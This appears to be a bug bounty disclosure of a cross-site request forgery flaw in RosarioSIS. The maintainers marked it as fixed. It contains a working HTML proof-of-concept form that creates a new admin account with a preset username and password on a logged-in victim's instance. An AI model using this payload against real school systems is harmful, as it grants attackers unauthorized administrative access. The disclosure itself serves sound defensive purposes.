Cross-Site Request Forgery (CSRF) in francoisjacquet/rosariosis

Valid

Reported on

Jul 28th 2021

✍️ Description

When you don't set the SameSite attribute of cookies the browsers have special act in front of this issue.(I mean set default value on it) chrome and chromium based browsers set the attribute "Lax" that mean if you do add/delete/alter operation in a get HTTP request then your site more vulnerable with CSRF attacks.

But Firefox and safari ( one of big ones ) don't set this attribute to "Lax" and set it to "none" that makes all POST and GET requests more Vulnerable to CSRF attack.

In Firefox and Safari I can add any custom user With CSRF that users already allowed manually do it.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.rosariosis.org/demonstration/Modules.php?modname=Users/User.php&category_id=1&staff_id=&modfunc=update" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="photo" value="" />
      <input type="hidden" name="staff&#91;TITLE&#93;" value="" />
      <input type="hidden" name="staff&#91;FIRST&#95;NAME&#93;" value="aaa" />
      <input type="hidden" name="staff&#91;MIDDLE&#95;NAME&#93;" value="" />
      <input type="hidden" name="staff&#91;LAST&#95;NAME&#93;" value="aaa" />
      <input type="hidden" name="staff&#91;NAME&#95;SUFFIX&#93;" value="" />
      <input type="hidden" name="staff&#91;USERNAME&#93;" value="aaa123aaa" />
      <input type="hidden" name="staff&#91;PASSWORD&#93;" value="aaa123aaa" />
      <input type="hidden" name="staff&#91;PROFILE&#93;" value="admin" />
      <input type="hidden" name="staff&#91;PROFILE&#95;ID&#93;" value="" />
      <input type="hidden" name="staff&#91;SCHOOLS&#93;&#91;1&#93;" value="" />
      <input type="hidden" name="staff&#91;EMAIL&#93;" value="" />
      <input type="hidden" name="staff&#91;CUSTOM&#95;200000001&#93;" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Here you should run PoC.html, after click on button you can see an admin user with name equals to aaa have been created.

💥 Impact

This vulnerability is capable of add any custom user.

Occurrences

index.php L1

Z-Old

commented 2 years ago

Admin

Hey amammad, I've reached out to the rosariosis team. Waiting to hear back.

We have contacted a member of the francoisjacquet/rosariosis team and are waiting to hear back 2 years ago

A francoisjacquet/rosariosis maintainer marked this as fixed with commit f95bd0 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

to join this conversation